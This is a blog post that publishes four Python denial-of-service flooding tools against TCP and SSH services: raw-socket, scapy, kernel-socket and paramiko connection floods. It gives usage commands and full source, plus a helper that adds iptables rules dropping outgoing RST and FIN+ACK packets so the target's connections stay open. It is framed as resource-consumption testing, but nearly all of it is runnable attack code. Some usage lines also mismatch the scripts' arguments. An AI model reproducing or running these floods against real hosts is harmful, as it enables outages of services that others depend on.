hacktracking: # DoS tools to test network resources consumption

# DoS tools to test network resources consumption

Raw-sockets

Fast and does not consume local resources.

# sip="192.168.1.1"
# dip="192.168.1.2"
# python clean_iptables.py $dip
# pypy raw-sockets-tcp3wh.py true 100 $sip $dip 22

Raw-scapy

Slow but does not consume local resources

# dip="192.168.1.2"
# python clean_iptables.py $ip
# python raw-scapy-tcp3wh.py true 100 $dip 22

Kernel-3wh

Fast but consumes local resources.

# sip="192.168.1.1"
# dip="192.168.1.2"
# python clean_iptables.py $dip
# pypy kernel-tcp3wh.py 50 true $sip $dip 22

Kernel-sshopen

Fast but consumes local resources.

# sip="192.168.1.1"
# dip="192.168.1.2"
# python clean_iptables.py $dip
# python kernel-sshopen.py true 50 $sip $dip 22

Source code

# cat lib.py
import subprocess
import sys

def iptables(action, dip = None):
 command = 'iptables -t filter -n -L OUTPUT'
 p = subprocess.Popen(command.split(' '), stdout = subprocess.PIPE)
 result = p.communicate()[0]
 if action == 'add':
  if dip not in result:
   command = 'iptables -A OUTPUT -p tcp -d ' + dip + ' --tcp-flags RST RST -j DROP'
   subprocess.Popen(command.split(' '))
   command = 'iptables -A OUTPUT -p tcp -d ' + dip + ' --tcp-flags FIN,ACK FIN,ACK -j DROP'
   subprocess.Popen(command.split(' '))
   command = 'iptables -t filter -n -L OUTPUT'
   p = subprocess.Popen(command.split(' '), stdout = subprocess.PIPE)
   result = p.communicate()[0]
 elif action == 'delete':
  if dip in result:
   command = 'iptables -D OUTPUT -p tcp -d ' + dip + ' --tcp-flags RST RST -j DROP'
   subprocess.Popen(command.split(' '))
   command = 'iptables -D OUTPUT -p tcp -d ' + dip + ' --tcp-flags FIN,ACK FIN,ACK -j DROP'
   subprocess.Popen(command.split(' '))
   command = 'iptables -t filter -n -L OUTPUT'
   p = subprocess.Popen(command.split(' '), stdout = subprocess.PIPE)
   result = p.communicate()[0]
 print result

def ctrlc(signal, frame):
 print '=> Interruption'
 print '[+] Done'
 sys.exit()

# cat clean_iptables.py
#! /usr/bin/env python

import lib
import sys

dip = sys.argv[1]
lib.iptables('delete', dip)

# cat raw-sockets-tcp3wh.py
#! /usr/bin/env python

# Author: t0n1
# Description: Raw Sockets TCP 3 Way Handshake flooding tool

import lib
import random
import signal
import socket
import struct
import sys
import threading
import time

loop = sys.argv[1]
threads = int(sys.argv[2])
sip = sys.argv[3]
sport = random.randint(1024, 65535)
dip = sys.argv[4]
dport = int(sys.argv[5])

class IP():
 def __init__(self, sip, dip):
  self.ver = 4
  self.ihl = 5
  self.tos = 0
  self.tl = 0
  self.ide = 0
  self.frag_off = 0
  self.ttl = 255
  self.proto = socket.IPPROTO_TCP
  self.check = 0
  self.saddr = socket.inet_aton(sip)
  self.daddr = socket.inet_aton(dip)

 def make_header(self):
  self.header = struct.pack('!BBHHHBBH4s4s', \
   (self.ver << 4) + self.ihl, self.tos, self.tl, \
   self.ide, self.frag_off, \
   self.ttl, self.proto, self.check, \
   self.saddr, \
   self.daddr)

class TCP():
 def __init__(self, sport, dport):
  self.sport = sport
  self.dport = dport
  self.seq = 0
  self.ack_num = 0
  self.doff = 5
  self.urg = 0
  self.ack = 0
  self.psh = 0
  self.rst = 0
  self.syn = 0
  self.fin = 0
  self.window = 29200
  self.check = 0
  self.urg_ptr = 0

 def make_header(self):
  self.header = struct.pack('!HHLLBBH', \
   self.sport, self.dport, \
   self.seq, \
   self.ack_num, \
   (self.doff << 4) + 0, self.flags,  self.window) + \
   struct.pack('H', self.check) + \
   struct.pack('!H', self.urg_ptr)

 def make_flags(self):
  self.flags = (self.urg << 5) + (self.ack << 4) + (self.psh << 3) + (self.rst << 2) + (self.syn << 1) + self.fin
 
def checksum(msg):
 s = 0
 for i in range(0, len(msg), 2):
  w = ord(msg[i]) + (ord(msg[i+1]) << 8 )
  s = s + w
 s = (s >> 16) + (s & 0xffff);
 s = s + (s >> 16);
 s = ~s & 0xffff
 return s
 
def tcp3wh(sip, sport, dip, dport):
 try:
  ip = IP(sip, dip)
  tcp = TCP(sport, dport)
  tcp.syn = 1
  tcp.make_flags()
  tcp.make_header()

  pseudo_header = struct.pack('!4s4sBBH', ip.saddr, ip.daddr, 0, ip.proto, len(tcp.header)) + tcp.header
  tcp.check = checksum(pseudo_header)
  tcp.make_header()

  packet = tcp.header

  s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
  s.bind(('', 0))
  s.sendto(packet, (dip, 0))
  data = s.recv(1024)
  ack_num = struct.unpack('!L', data[24:28])[0] + 1

  tcp.seq += 1
  tcp.ack_num = ack_num
  tcp.syn = 0
  tcp.ack = 1
  tcp.make_flags()
  tcp.check = 0
  tcp.make_header()
  pseudo_header = struct.pack('!4s4sBBH', ip.saddr, ip.daddr, 0, ip.proto, len(tcp.header)) + tcp.header
  tcp.check = checksum(pseudo_header)
  tcp.make_header()
  packet = tcp.header
  s.sendto(packet, (dip, 0))
 except:
  pass

signal.signal(signal.SIGINT, lib.ctrlc)

if loop != 'true':
 loop = int(loop)

print '[+] Target = ' + dip
print '[+] Droping output TCP RST and FIN+ACK'
lib.iptables('add', dip)

while loop > 0:
 print '[+] Launching threads = ',
 for i in range(threads):
  print i + 1,
  sport = (sport + 1) % 65535
  if sport < 1024: sport += 1024
  threading.Thread(target = tcp3wh, args = (sip, sport, dip, dport)).start()
 print
 print sport
 time.sleep(1)
 if loop != 'true': loop -= 1
print '[+] Done'

# cat raw-scapy-tcp3wh.py
#! /usr/bin/env python

# Author: t0n1
# Description: Raw Scapy TCP 3 Way Handshake flooding tool

import lib
import random
import signal
from scapy.all import *
import signal
import sys
import threading

loop = sys.argv[1]
threads = int(sys.argv[2])
dip = sys.argv[3]
dport = int(sys.argv[4])

def tcp3wh(dip, dport):
 ip = IP(dst = dip)
 sport = seq = random.randint(1024, 65535)
 tcp_syn = TCP(dport = dport, sport = sport, flags = 'S', seq = seq)
 packet = ip/tcp_syn
 tcp_synack = sr1(packet, verbose = 0)
 ack = tcp_synack.seq + 1
 tcp_ack = TCP(dport = dport, sport = sport, flags = 'A', seq = seq + 1, ack = ack)
 packet = ip/tcp_ack
 send(packet, verbose = 0)

signal.signal(signal.SIGINT, lib.ctrlc)

if loop != 'true':
 loop = int(loop)

print '[+] Target = ' + dip
print '[+] Droping output TCP RST and FIN+ACK'
lib.iptables('add', dip)

while loop > 0:
 print '[+] Launching threads = ',
 for i in range(threads):
  print i + 1,
  threading.Thread(target = tcp3wh, args = (dip, dport)).start()
 print
 if loop != 'true': loop -= 1
print '[+] Done'

# cat kernel-tcp3wh.py
#! /usr/bin/env python

# Author: t0n1
# Description: Kernel TCP 3 Way Handshake flooding tool

import lib
import random
import signal
import socket
import sys
import threading
import time

loop = sys.argv[1]
threads = int(sys.argv[2])
sip = sys.argv[3]
sport = random.randint(1024, 65535)
dip = sys.argv[4]
dport = int(sys.argv[5])

def tcp3wh(sip, sport, dip, dport):
 try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind((sip, sport))
  s.connect((dip, dport))
  s.shutdown(socket.SHUT_RDWR)
  s.close()
 except:
  pass

signal.signal(signal.SIGINT, lib.ctrlc)

if loop != 'true':
 loop = int(loop)

print '[+] Target = ' + dip
print '[+] Droping output TCP RST and FIN+ACK'
lib.iptables('add', dip)

while loop > 0:
 print '[+] Launching threads = ',
 for i in range(threads):
  print i + 1,
  sport = (sport + 1) % 65535
  if sport < 1024: sport += 1024
  threading.Thread(target = tcp3wh, args = (sip, sport, dip, dport)).start()
 print
 print sport
 time.sleep(1)
 if loop != 'true': loop -= 1
print '[+] Done'

# cat kernel-sshopen.py
#! /usr/bin/env python

# Author: t0n1
# Description: Kernel SSH-Open flooding tool

import lib
import paramiko
import random
import signal
import socket
import sys
import threading
import time

loop = sys.argv[1]
threads = int(sys.argv[2])
sip = sys.argv[3]
sport = random.randint(1024, 65535)
dip = sys.argv[4]
dport = int(sys.argv[5])

def openssh(sip, sport, ip, dport):
 try:
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind((sip, sport))
  s.connect((dip, dport))
  t = paramiko.transport.Transport(s)
  time.sleep(1)
 except:
  pass

signal.signal(signal.SIGINT, lib.ctrlc)

if loop != 'true':
 loop = int(loop)

print '[+] Target = ' + dip
print '[+] Droping output TCP RST and FIN+ACK'
lib.iptables('add', dip)

while loop > 0:
 print '[+] Launching threads = ',
 for i in range(threads):
  print i + 1,
  sport = (sport + 1) % 65535
  if sport < 1024: sport += 1024
  threading.Thread(target = openssh, args = (sip, sport, dip, dport)).start()
 print
 print sport
 time.sleep(1)
 if loop != 'true': loop -= 1
print '[+] Done'

# DoS tools to test network resources consumption

No comments: